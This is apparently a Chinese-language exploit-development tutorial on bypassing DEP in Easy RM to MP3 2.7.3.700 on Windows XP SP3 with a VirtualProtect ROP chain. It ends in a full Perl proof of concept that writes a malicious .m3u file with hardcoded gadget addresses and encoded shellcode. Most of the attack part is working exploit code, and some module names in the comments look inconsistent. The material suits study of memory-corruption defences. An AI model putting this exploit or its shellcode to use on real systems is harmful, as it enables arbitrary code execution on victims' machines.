VirtualProtect 2方法 -direct ret-dep-easy rm to mp3

本次试验已经解决了 00字符的问题，

还有的问题在于用了很多的 系统DLL   试验在 XP SP3 下进行的~~~~

例子软件：easy rm to mp3 2.7.3.700~~~~~~~~~~~~~~~~~~~~~~~

ROP链 =   很多歌ROP小配件

ROP小配件 =  每个指令 + ret

怎么找 ROP小配件：  1 直接找一些指令+ret  2 直接找到全部 ret 往回看是否符合需要  3 通过插件来寻找

!pvefindaddr noaslr  寻找 no aslr 的模块

!pvefindaddr rop -m kernel32.dll nonull //rop选项会自动忽略 aslr 模块

开始构造参数前，我们可以去 手动构造 参数 看看是否 VirtualProtect 可以成功

精巧布置参数：

1） shellcode指针，最简单的方法就有事把ESP 的地址放在一个寄存器中，然后增长它指向 shellcode，当然也可能有其他方法

2）shellcode 大小 ，

3）0x40 ,   设置一个寄存器一个开始值然后增加直到它包含 0x40 ,或者可以找在寄存器的值 add / sub 得到 0x40,开始值放入

~~~~~动态将构造的值放回栈上  可以增加ESP 去覆盖，也可以直接 mov dword ptr [reg+offset]

构造阶段1 ）保存栈指针然后跳过参数

比如 (下面为伪代码)   执行完要到达 XXXX,   edi = eax = 原esp  

ret

push esp,    pop edi,      ret

push edi,     pop eax,      pop ebp,     ret

add esp,0x20 ,               ret

VirtualProtect address

param1  return address

param2  lpAddress

param3  Size

param4  flNewProtect

param5  writeable address

padding nop 8bytes

XXXX

构造阶段2）精巧制作第一个参数（返回值）

构造shellcode 起始地址，和VirtualProtect 函数的返回值，当函数已经将页面标记为可执行时，它会自动跳到那里

比如 (下面为伪代码) 

xchg esi,edi      #edx ecx   #ret 4

add eax,0x100  pop ebp  ret 

padding nop 8 bytes

mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret

padding  nop  4 bytes

 工具： http://sourceforge.net/projects/unxutils/
        想在windows上使用unix，其实大量几乎所有的unix工具被翻译了对应的windows的可执行exe程序，我们可以下载这些工具然后路径加入系统的path，然后就可以像使用windows系统自带的dos命令一样使用这些工具。通过这种方式我们可以在windows上使用大部分的unix的工具，对于从unix，linux到windows的用户，可以很好的保持原来的习惯和知识，对于本来的windows用户也可以使用这些工具提高工作效率，特别地在windows的批处理中使用这些命令很方便。
cat rop.txt | grep "MOV DWORD PTR DS:[ESI+10],EAX #MOV EAX,ESI" 

构造阶段3）精巧制作第二个参数（lpAddress）

可以简单的使用同样的指针,但要做一些修改

push eax  # pop esi  $ret

add eax,100  #pop ebx, ret

padding nops 4 bytes

add esi,4 + ret  / 4个  inc esi,ret

mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret

padding  nop  4 bytes

构造阶段4）精巧制作第三+四个参数（大小+保护标志0x40）

第三个参数设置为 0x300, 需要小配件为 xor eax,eax, add eax,0x100

增加ESI 4字节  EAX写入 esi+0x10

第四个参数也差不多

push eax  # pop esi  $ret

xor eax,eax  ret

add eax,0x100  pop ebp

padding  nop  4 bytes

add eax,0x100  pop ebp

padding  nop  4 bytes

add eax,0x100  pop ebp

padding  nop  4 bytes

add esi,4 + ret  / 4个  inc esi,ret

mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret

padding  nop  4 bytes

push eax  # pop esi  $ret

xor eax,eax ret

add eax,0x40  pop ebp ret

padding  nop  4 bytes

add esi,4 + ret  / 4个  inc esi,ret

mov dword ptr ds:[esi+0x10],eax   #mov eax,esi  #pop esi  #ret

padding  nop  4 bytes

sub eax,4  # ret

sub eax,4  # ret

push eax, pop esp  mov eax,edi, pop edi, pop esi, ret

最后放置shellcode  即可运行~~~~~

Perl  POC: 详细代码：

my $file = "exploits.m3u";#perl  

my $junk= "x41"x26075;


my $ret = pack("V",0x7C80165E);#RET

my $padding = "x"x4;

my $ajust = pack("V",0x771F8022);# PUSH ESP # MOV EAX,EDX # POP EDI # RETN  [Module : comctl32.dll]  **
$ajust = $ajust.pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** 
$ajust = $ajust."x"x4;
$ajust = $ajust.pack("V",0x73DB2638); # ADD ESP,20 # RETN 4 	[Module : MFC42.DLL]  ** 

my $AddressOfVirtualProtect = pack("V",0x7C801AD4);   #esp now 
my $param1 = "1111";
my $param2 = "2222";
my $param3 = "3333";
my $param4 = "4444";
my $param5 = "5555";
my $param = $param1.$param2.$param3.$param4.$param5."x"x8;
#####################11111111111111111111111#########################################
my $makeparam1 =  pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL32.dll]  **  保存esi = original esp
$makeparam1 = $makeparam1."x"x4; #top  RETN 4

$makeparam1 = $makeparam1.pack("V",0x77BEE842);# PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam1 = $makeparam1."x"x4;

$makeparam1 = $makeparam1.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
$makeparam1 = $makeparam1."x"x4;
$makeparam1 = $makeparam1.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
$makeparam1 = $makeparam1."x"x4;

# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  first param1 eax = address of shellcode
$makeparam1 = $makeparam1.pack("V",0x73DC0270); 
$makeparam1 = $makeparam1."x"x4;

#####################22222222222222222222222#########################################
my $makeparam2 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam2 = $makeparam2."x"x4; #top ret 4
$makeparam2 = $makeparam2."x"x4;

$makeparam2 = $makeparam2.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL32.dll]  **  保存esi = original esp

$makeparam2 = $makeparam2. pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  **   esi+4
$makeparam2 = $makeparam2.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
$makeparam2 = $makeparam2.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 
$makeparam2 = $makeparam2.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC42.DLL]  ** 

$makeparam2 = $makeparam2.pack("V",0x77BEE842);# PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam2 = $makeparam2."x"x4;
$makeparam2 = $makeparam2.pack("V",0x77C1EC2B);# ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
$makeparam2 = $makeparam2."x"x4;
$makeparam2 = $makeparam2.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax  = address of shellcode
$makeparam2 = $makeparam2."x"x4;

# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  second param2 eax = address of shellcode
$makeparam2 = $makeparam2.pack("V",0x73DC0270); 
$makeparam2 = $makeparam2."x"x4; 

#####################33333333333333333333333#########################################
my $makeparam3 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam3 = $makeparam3."x"x4; #top ret 4
$makeparam3 = $makeparam3."x"x4;
$makeparam3 = $makeparam3.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL32.dll]  **  保存esi = original esp
$makeparam3 = $makeparam3.pack("V",0x5D174FB8);  # XOR EAX,EAX # RETN 	[Module : COMCTL32.dll]  ** 

$makeparam3 = $makeparam3.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax = 100
$makeparam3 = $makeparam3."x"x4;

$makeparam3 = $makeparam3.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax =200
$makeparam3 = $makeparam3."x"x4;

$makeparam3 = $makeparam3.pack("V",0x77C1EC2B); # ADD EAX,100 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax = 300
$makeparam3 = $makeparam3."x"x4;

$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  **   esi+8
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  **   
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 
$makeparam3 = $makeparam3.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC43.DLL]  ** 

# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  second param3 
$makeparam3 = $makeparam3.pack("V",0x73DC0270); 
$makeparam3 = $makeparam3."x"x4; 

#####################44444444444444444444444#########################################
my $makeparam4 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam4 = $makeparam4."x"x4; #top ret 4
$makeparam4 = $makeparam4."x"x4;
$makeparam4 = $makeparam4.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL42.dll]  **  保存esi = original esp
$makeparam4 = $makeparam4.pack("V",0x5D174FB8);  # XOR EAX,EAX # RETN 	[Module : COMCTL42.dll]  ** 

$makeparam4 = $makeparam4.pack("V",0x77C1EC1D);  # ADD EAX,40 # POP EBP # RETN 	[Module : msvcrt.dll]  **  eax =40
$makeparam4 = $makeparam4."x"x4;

$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  **   esi+0xc
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  **   
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  **   
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam4 = $makeparam4.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 

# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  second param4 
$makeparam4 = $makeparam4.pack("V",0x73DC0270); 
$makeparam4 = $makeparam4."x"x4; 

#####################55555555555555555555555#########################################
my $makeparam5 = pack("V",0x77BEE842);   # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam5 = $makeparam5."x"x4; #top ret 4
$makeparam5 = $makeparam5."x"x4;
$makeparam5 = $makeparam5.pack("V",0x5D1D11F6);  # XCHG EAX,ESI # RETN 	[Module : COMCTL42.dll]  **  保存esi = original esp

$makeparam5 = $makeparam5.pack("V",0x77BEE842);  # PUSH EDI # POP EAX # POP EBP # RETN 	[Module : msvcrt.dll]  ** eax = original esp
$makeparam5 = $makeparam5."x"x4;

$makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
$makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
$makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
$makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
$makeparam5 = $makeparam5.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 

$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  **   esi+0x10
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 
$makeparam5 = $makeparam5.pack("V",0x73DC8F7F); # INC ESI # CMP AL,5E # RETN 	[Module : MFC44.DLL]  ** 


# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN 4  [Module : MFC42.DLL]  **  second param4 
$makeparam5 = $makeparam5.pack("V",0x73DC0270); 
$makeparam5 = $makeparam5."x"x4; 

#####################just#########################################
my $just = pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 
$just = $just.pack("V",0x76A812F1);  # SUB EAX,4 # RETN 	[Module : ole32.dll]  ** 

$just = $just.pack("V",0x5D19E24D);  # XCHG EAX,ESP # RETN 	[Module : COMCTL32.dll]  ** 
$just = $just."x"x4; #top 4



#shellcode start esp
my $shellcode = "x90"x76;
$shellcode = $shellcode."x81xEFxEExFDxFFxFF";    #SUB EDI,-212

#shellcode start edi
$shellcode = $shellcode."WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylaxrJTJP8Wn0h3SK98QpOe84rqdLQDLLKXtNmSNYdUckkoGdDFKKSsVoKvSp2RsaxcEPsU5Qbsd03N21tLKPZ4pNkqKflLKQKDLLKEKLKuKLKQKtXlKJKlmwMbJ5ZTxeNrUGuJ5KO1GZXJ550LKw57LlKPLWuQhUShMLKPYGPWskmvSKOQWlKttOKDCkEJ9dOoNVf4zzdBT7xKqKzc7gsJpqV8kJQukQDddglaezDLKSia4S3IMcVLKwLQkLKQIELESKmS3dloKlUqONKqGQqWMqzVjP8eNrUI9WC9KPSphpdQq6PWS586CpPpaBNnkKtRsPPpP2syo1GKL0SKORw";
my $payload= $junk.$ret.$padding.$ajust.$AddressOfVirtualProtect.$param.$makeparam1. $makeparam2.$makeparam3.$makeparam4.$makeparam5.$just.$shellcode;

print length($payload);
open($FILE,">$file");    
binmode($FILE);#######
print $FILE $payload;    
close($FILE);